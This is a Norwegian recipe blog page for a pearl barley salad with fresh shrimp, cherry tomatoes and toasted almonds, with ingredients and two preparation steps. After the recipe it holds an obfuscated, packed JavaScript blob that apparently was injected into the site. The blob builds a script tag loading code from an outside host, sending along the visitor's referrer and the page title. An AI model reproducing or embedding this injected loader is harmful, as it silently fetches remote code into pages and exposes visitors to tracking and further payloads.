Perlebyggsalat med ferske reker og ristede mandler

perlebyggreker

Nydelig salat, perfekt mat på en fredag etter en hektisk jobbuke. Lett og ledig, enkelt og greit. Litt pirk med å skrelle rekene men det er det verdt. Frisk og vårlig salat med perlebygg, ristede mandler, tomater og grønn salat. Det eneste du trenger i tillegg er litt sitron og olivenolje. Kan det bli bedre?

ingredienser

Ingredienser

4 pers

1 kg reker

1,5 dl perlebygg

1 pkt små tomater

blandet småsalat

2 never ristede mandler

1 sitron

olivenolje

reker

1. Skrell rekene og kok perlebygg etter anvisning på pakken.Kjøl ned perlebygg.

2. Del tomatenen i små båter, skyll salaten. Grovhakk mandlene og bland godt i en salatbolle, fordel jevnt over på tallerkene og dryss over sitron og olivenolje.

perlebyggreker

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

Write a comment

Your email address will not be published. Required fields are marked *